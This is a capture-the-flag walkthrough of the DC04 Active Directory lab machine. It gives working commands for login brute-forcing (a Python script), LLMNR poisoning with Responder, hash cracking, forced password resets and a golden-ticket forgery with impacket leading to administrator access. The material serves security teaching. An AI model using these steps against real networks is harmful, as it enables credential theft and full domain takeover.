# DC04

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FwGv4iq2as0taI9TQcoih%2FPasted%20image%2020250312020103.png?alt=media&#x26;token=7ad8e851-60e6-4d6a-a881-01091a4e1e48" alt=""><figcaption></figcaption></figure>

Download it and unzip, and configure the networks like in this machine DC01.

## Enumeration:

We will smb sweep to find its IP:

```bash
netexec smb 10.0.2.0/24
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FwcMG8Y3OgYCogun2Vfv4%2FPasted%20image%2020250312020910.png?alt=media&#x26;token=85947906-b7f2-415c-b726-e978c7e94851" alt=""><figcaption></figcaption></figure>

So we will add it to the /etc/hosts:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjUc7h2XU3672JmcadQD0%2FPasted%20image%2020250312020953.png?alt=media&#x26;token=7b517292-4d7b-4cef-a7e8-7895dd619a7c" alt=""><figcaption></figcaption></figure>

Now lets start nmap scan to scan all tcp ports:

```bash
sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F01An5bANqFNuTLe89jaB%2FPasted%20image%2020250312021449.png?alt=media&#x26;token=c8a63d1f-5d3b-4a64-91e6-7b2ca3edbcca" alt=""><figcaption></figcaption></figure>

Its an active directory machine, and we have a web server running on it.

We can dir and vhost fuzzing:

```bash
gobuster dir -u http://soupedecode.local -w /usr/share/wordlists/dirb/common.txt -t 16
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FhbL60RuAOnzuIaUvKl1K%2FPasted%20image%2020250312023904.png?alt=media&#x26;token=ce8f9cdd-7621-44f0-aa01-2589114516a4" alt=""><figcaption></figcaption></figure>

But we have a lot of 403 with the same size, we can exclude the size in gobuster using `--exclude-length`:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjmWGoCLGMlxa1j2dMcM1%2FPasted%20image%2020250312023110.png?alt=media&#x26;token=b4193116-1030-4228-a037-2c23adb6d1b5" alt=""><figcaption></figcaption></figure>

Lets take a look at the server-info:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FPWCCmFUvCWSKjJFGC9NS%2FPasted%20image%2020250312023241.png?alt=media&#x26;token=332e32c6-4455-461d-9661-d7cead55009f" alt=""><figcaption></figcaption></figure>

This file usually will discloses configuration information of the web server, we can find hidden directories or files or subdomains for example.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fvmfkn7B0nL5V6OWtHS0O%2FPasted%20image%2020250312024222.png?alt=media&#x26;token=9b2e390a-796f-4209-ab46-88d1540000e4" alt=""><figcaption></figcaption></figure>

If we search a little bit we will find this subdomain.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FFAWleVzpOXm2XaaEjyi6%2FPasted%20image%2020250312024303.png?alt=media&#x26;token=a4a3ecd8-b2ef-4f85-be77-2a2c082bdda5" alt=""><figcaption></figcaption></figure>

Lets add it to the /etc/hosts.

## LLMNR poisoning to get NTLMv2 of websvc:

We need credentials to authenticate:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F1HAZIk74HhLf0Aej2tny%2FPasted%20image%2020250312024348.png?alt=media&#x26;token=360ebf86-3c45-4d3b-8fc0-3595ac24ec89" alt=""><figcaption></figcaption></figure>

Lets try some combinations of default credentials:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FNeDA4hK28qHZp3MlmbJA%2FPasted%20image%2020250312024408.png?alt=media&#x26;token=9de12b4d-a882-4dde-b044-085761d3df7e" alt=""><figcaption></figcaption></figure>

Invalid credentials with admin:admin.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FRTDS5iJsovh6rWrZRjhD%2FPasted%20image%2020250312024434.png?alt=media&#x26;token=c9597ed6-41cf-47c2-a955-4a0273bdb19f" alt=""><figcaption></figcaption></figure>

Also there is not sqli.

Lets get the format of body of the request, to start brute forcing:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fxp6LWAR50t9xI9lUZ6aX%2FPasted%20image%2020250312024932.png?alt=media&#x26;token=6ccea3ac-cafb-427b-8bab-87855e2d9337" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FKImVGktcMFaduodpqN7Y%2FPasted%20image%2020250312024914.png?alt=media&#x26;token=83ea3698-f847-4613-8b9f-a50b4ae8a273" alt=""><figcaption></figcaption></figure>

I wrote this simple script that will help us to brute force this login form using a simple wordlist:

```python
import requests

url = 'http://heartbeat.soupedecode.local'
end_point = '/login.php'
session = requests.session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,'
                     'image/svg+xml,*/*;q=0.8',
           'Accept-Language': 'en-US,en;q=0.5',
           'Accept-Encoding': 'gzip, deflate, br',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Content-Length': '29',
           'Origin': 'http://heartbeat.soupedecode.local',
           'Connection': 'keep-alive',
           'Referer': 'http://heartbeat.soupedecode.local/login.php',
           'Upgrade-Insecure-Requests': '1',
           'Priority': 'u=0, i'
           }

with open('/usr/share/seclists/Passwords/UserPassCombo-Jay.txt', 'r') as wordlist:
    words = wordlist.readlines()
    for username in words:
        username = username.strip()
        for password in words:
            password = password.strip()
            data = f'username={username}&password={password}'
            req = session.post(url=url + end_point, headers=headers, data=data)
            if 'Invalid username' in req.text:
                continue
            else:
                print(f'Valid Credentials: {username}:{password}')
                break
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FOodwGb4rX2F5VPH7p1Hf%2FPasted%20image%2020250312054524.png?alt=media&#x26;token=69ff478c-3a0a-4c72-af00-bd5323aa3022" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FXnhv8tjZRp9OUZ9pK7EY%2FPasted%20image%2020250312054601.png?alt=media&#x26;token=e3ebb452-af01-4830-9757-8dc2e364052b" alt=""><figcaption></figcaption></figure>

I restarted this machine more than one time, so the IP changed as you progress in reading this blog to 10.0.2.33.

After a while we will get those credentials.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F6bUDl7h2O7lZnSYoxQNG%2FPasted%20image%2020250312054737.png?alt=media&#x26;token=ca99594b-1467-4f2b-a91b-126466df6651" alt=""><figcaption></figcaption></figure>

Here it is asking for IP, lets try SSRF:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FBTOqxlwwQn2wqRnFDvMx%2FPasted%20image%2020250312054810.png?alt=media&#x26;token=c6dc1fe2-4224-4eb5-b55c-7f1662a013c7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjTb6K5lNgtl1EkCg9BQt%2FPasted%20image%2020250312054858.png?alt=media&#x26;token=c2dd1fbe-99c3-40a3-a2be-56bd27255727" alt=""><figcaption></figcaption></figure>

I could not get to anything.

But lets start responder and try to capture the ntlmv2:

```bash
sudo reponder -I eth0 -dvw
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F9ZoD1J4prGi6ZVMPQidC%2FPasted%20image%2020250312055644.png?alt=media&#x26;token=79de79ed-ff44-4f58-abe3-8d53654ca3c6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FSbkisayTWmdxQ3Rk5tbp%2FPasted%20image%2020250312055708.png?alt=media&#x26;token=9194fd06-ebea-4efb-905b-ab2eb46a209d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FBf9hMbx6h6QYw4qWCnPb%2FPasted%20image%2020250312055725.png?alt=media&#x26;token=c0253c42-9d08-4055-92c1-cf15e27fd684" alt=""><figcaption></figcaption></figure>

We captured the websvc hash, we can crack it with hashcat:

```bash
hashcat websvc.hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FUeEbChBtinUMqzr3HtuG%2FPasted%20image%2020250312055808.png?alt=media&#x26;token=7a0c9ed0-9480-45af-9737-985efa74d337" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FD5OK9bdvuw7fG8DQOMKz%2FPasted%20image%2020250312055819.png?alt=media&#x26;token=abaf5749-b603-46c5-a1cb-2126bb0b1cfb" alt=""><figcaption></figcaption></figure>

Here we have the password cracked.

Lets try to authenticate:

```bash
netexec smb soupedecode.local -u websvc -p jordan23
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FbobUvISqza9lRH5KuhXi%2FPasted%20image%2020250312055906.png?alt=media&#x26;token=05e811d1-e36a-48e8-b6b9-21c7594e7195" alt=""><figcaption></figcaption></figure>

It says the password expired, so we can go to the logonui prompt to reset it:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FF7Xi4kyfkpeU6oh7CMxa%2FPasted%20image%2020250312061855.png?alt=media&#x26;token=78131033-f19f-4163-814f-3a59af8213df" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FhP5qseIPFACSUVPBA8VP%2FPasted%20image%2020250312061920.png?alt=media&#x26;token=43530e82-b2d4-41df-b944-dc312c43dd3c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FXX4X76j8IR82d8Zl565H%2FPasted%20image%2020250312062003.png?alt=media&#x26;token=5c9e003d-41d4-460d-97da-45d43f451719" alt=""><figcaption></figcaption></figure>

The password has been change, lets try it out:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FnIMyEUUxzzgvqfMgiB08%2FPasted%20image%2020250312062045.png?alt=media&#x26;token=089cf488-61e5-41e2-9c64-80042d80b320" alt=""><figcaption></figcaption></figure>

Finally we have valid credentials.

Lets collect the domain data and do some bloodhound enumeration:

```bash
bloodhound-python -u websvc -p Caesar3 -ns 10.0.2.33 -d soupedecode.local -dc dc01.soupedecode.local
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FB9cMHkRlYrS6lwsp3brO%2FPasted%20image%2020250312064416.png?alt=media&#x26;token=9552f254-578b-4c83-b371-da9659e7c7f1" alt=""><figcaption></figcaption></figure>

For some reason we need to set a fake dns server for this to work:

```bash
dnschef --fakeip 10.0.2.33
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FvNyMe0HgkrUb4nNxyHe3%2FPasted%20image%2020250312063607.png?alt=media&#x26;token=a35b1784-100a-42aa-bdef-cffc3eeeadee" alt=""><figcaption></figcaption></figure>

And now re-execute the bloodhound command but instead our localhsot IP instead of the target IP:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FJrovT0F85LChnuZqI8Md%2FPasted%20image%2020250312064556.png?alt=media&#x26;token=86ba20b1-3543-493a-ac97-fa94a2fad084" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FrGNiH7QaL1STpqjHlNzL%2FPasted%20image%2020250312064633.png?alt=media&#x26;token=fdc3cf7d-dc1c-4557-9a3f-04d9d8ab6756" alt=""><figcaption></figcaption></figure>

Lets start bloodhound, but first we need to star the database that bloodhound can use:

```bash
sudo neo4j start
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FO8f9CZDaXstgFdJbt6fl%2FPasted%20image%2020250312064712.png?alt=media&#x26;token=2124b697-40a8-467c-82c7-67393656452d" alt=""><figcaption></figcaption></figure>

After that we will go to that link and login as neo4j:neo4j, and reset the password, and will use the same credentials to authenticate in bloodhound:

```bash
bloodhound
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FjuMqzkN9dAIDluKHExkk%2FPasted%20image%2020250312064739.png?alt=media&#x26;token=632292a9-ce56-4ba3-bd5a-090746a00e44" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FawQxLRNd6g9VZ3PHtEtl%2FPasted%20image%2020250312064753.png?alt=media&#x26;token=1d526207-8d37-4370-bdd4-f2f5e097b2bc" alt=""><figcaption></figcaption></figure>

Drag and drop those json files into bloodhound:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FWvqteFBuLCeFV57BEkHO%2FPasted%20image%2020250312064842.png?alt=media&#x26;token=7e383bce-5cbf-4b2c-89f0-753af00091a2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F3kRQeUSZZcpVMPQ5qRtE%2FPasted%20image%2020250312064904.png?alt=media&#x26;token=b32186ce-ea5d-4ef9-9b58-2dcaf2c52725" alt=""><figcaption></figcaption></figure>

I did not find anything could help us.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fwd19o0PMOz0RSyS4EhgZ%2FPasted%20image%2020250312062204.png?alt=media&#x26;token=5fd7ddab-5182-497a-b7b2-753b39c04f2f" alt=""><figcaption></figcaption></figure>

Nothing interesting in the home directory of the websvc user in the C share that we have read access to.

## Move Laterally to rtina979:

Lets move on to dump other users:

```bash
netexec smb soupedecode.local -u websvc -p Caesar3 --users > temp.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fwz039AOL6jVYjbZ6LpY5%2FPasted%20image%2020250312062433.png?alt=media&#x26;token=3e73ffd0-73e4-487e-9f8d-7d0dc01355b7" alt=""><figcaption></figcaption></figure>

Grep the users out of that temp file:

```bash
cat temp.txt | awk '{print $5}' > users.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FE6Ju2VRSP1MKcnbWHiLX%2FPasted%20image%2020250312062528.png?alt=media&#x26;token=cee49706-ef99-4365-b506-b80d93460a5d" alt=""><figcaption></figcaption></figure>

If we extracted the description of the users, we will find this default password for a user:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FYhRWqQruubXDNkSRf8cO%2FPasted%20image%2020250312062724.png?alt=media&#x26;token=b7f3f0bd-9575-4032-94d9-de1de9cc25f3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FHySwHt18mK4mrdIYbqaj%2FPasted%20image%2020250312063235.png?alt=media&#x26;token=5f89e4c3-5672-4197-a214-246cdcf235b7" alt=""><figcaption></figcaption></figure>

Try to authenticate:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FTaGbniIYnLRP9xKzuZfH%2FPasted%20image%2020250312063354.png?alt=media&#x26;token=2de04f64-4690-4388-a1b8-ebbbac6dd18a" alt=""><figcaption></figcaption></figure>

Also expired, so we can change the user using smbpasswd or impacket-changepasswd:

```bash
impacket-changepasswd 'soupedecode.local'/'rtina979'@'soupedecode.local' -newpass 'Caesar3!' -altuser websvc -altpass Caesar3
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FYj5RKCHE0SOnsv3KZKpm%2FPasted%20image%2020250312065547.png?alt=media&#x26;token=44d90f68-d8fa-4dfb-abbd-d5ed8b456794" alt=""><figcaption></figcaption></figure>

We changed the password successfully.

## Privilege Escalatio via Golden Ticket attack:

Lets go back to the C share again to check the rtina979 home directory:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fd25gwOpiNcXTWFsMTlwK%2FPasted%20image%2020250312070632.png?alt=media&#x26;token=52d6d41d-42b6-4bd0-8f71-d13e2be75771" alt=""><figcaption></figcaption></figure>

After doing enumeration in this share I found file called Report.rar:

```bash
smbclient \\\\10.0.2.33\\C -U 'rtina979%Caesar3!'
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FIgaStvu7rer3F05us6Qz%2FPasted%20image%2020250312070600.png?alt=media&#x26;token=c2274962-adb5-491e-bf50-f362af5a71e9" alt=""><figcaption></figcaption></figure>

Downloading it and trying to extract it:

```bash
unrar x Report.rar
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fhsocv2uJMI63wqrt2A4r%2FPasted%20image%2020250312070706.png?alt=media&#x26;token=ea8295af-c505-4553-bd3f-90080eddf729" alt=""><figcaption></figcaption></figure>

But its is encrypted with a password, we can use rar2john and then try to crack that hash to get the password for that archive:

```bash
rar2john Report.rar > report.hash
```

```bash
john report.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F1C6K0MoMYNKgEK6sUz7u%2FPasted%20image%2020250312070936.png?alt=media&#x26;token=f4081492-9f9b-43a1-9655-15a9776e6cdd" alt=""><figcaption></figcaption></figure>

Extract it again with that password:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FGw0bTCxCELpRAALA2r0D%2FPasted%20image%2020250312071022.png?alt=media&#x26;token=fccfe93c-14d1-4578-ab18-b00d23dc20b0" alt=""><figcaption></figcaption></figure>

We have a htm and bunch of js scripts.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F994J9wG9aI4W9ozXUQLR%2FPasted%20image%2020250312071224.png?alt=media&#x26;token=e3588015-d624-436f-ac34-86232e19e2dd" alt=""><figcaption></figcaption></figure>

If we open that .htm file in firefox:

We will that it is a penetration testing report:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FhXwnugoLC8cyIuAyWHRr%2FPasted%20image%2020250312071404.png?alt=media&#x26;token=44267a19-fb0d-4e63-ba0e-2d00d34b378f" alt=""><figcaption></figcaption></figure>

After some reading we will find the krbtgt hash to this target system, and companies usually do not change krbtgt hash because changing the password is not a simple task.

Lets try to get a golden ticket with that krbtgt hash:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FZvK2C2GxfDPvnCKqvaYi%2FPasted%20image%2020250312071540.png?alt=media&#x26;token=27907d4e-65bc-42d1-b876-7b423e971d2f" alt=""><figcaption></figcaption></figure>

But before that we need to get the SID of the domain, so we can run impacket-lookupsid to get it:

```bash
impacket-lookupsid soupedecode.local/rtina979:'Caesar3!'@10.0.2.33
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FmnKH11w5jvLUu3k07cwG%2FPasted%20image%2020250312072008.png?alt=media&#x26;token=3f366cc0-317d-42fa-a277-49fd8e7133f2" alt=""><figcaption></figcaption></figure>

Now we will use impacket-ticketer to forge a ticket:

```bash
impacket-ticketer -nthash "0f55cdc40bd8f5814587f7e6b2f85e6f" -domain-sid "S-1-5-21-2986980474-46765180-2505414164" -domain "soupedecode.local" "administrator"
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F4AgT9zRGNHfhSXViOuNU%2FPasted%20image%2020250312072156.png?alt=media&#x26;token=61d3167c-7369-4888-8dc8-0fdf29793400" alt=""><figcaption></figcaption></figure>

We need to export it to a variable called KRB5CCNAME, and try to authenticate via impacket-wmiexec:

```bash
export KRB5CCNAME=administrator.ccache
```

```bash
impacket-wmiexec administrator@dc01.soupedecode.local -k -no-pass -dc-ip 10.0.2.33
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F64OwAX9M5QBlA95sI1vH%2FPasted%20image%2020250312073105.png?alt=media&#x26;token=90e21269-6742-4ef7-86ad-4b74207b412d" alt=""><figcaption></figcaption></figure>

We got clock skew too great because the time between our local machine is more than 5 minutes, so we can use ntpdate to sync the time, and rerun that impacket-wmiexec command.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FJxn31m3Y1JUp7QFF5z8e%2FPasted%20image%2020250312073117.png?alt=media&#x26;token=ef40f765-9859-4ab0-b458-7ca36756e1e6" alt=""><figcaption></figcaption></figure>

Here is the root flag, you can find the user flag in the websvc home directory.
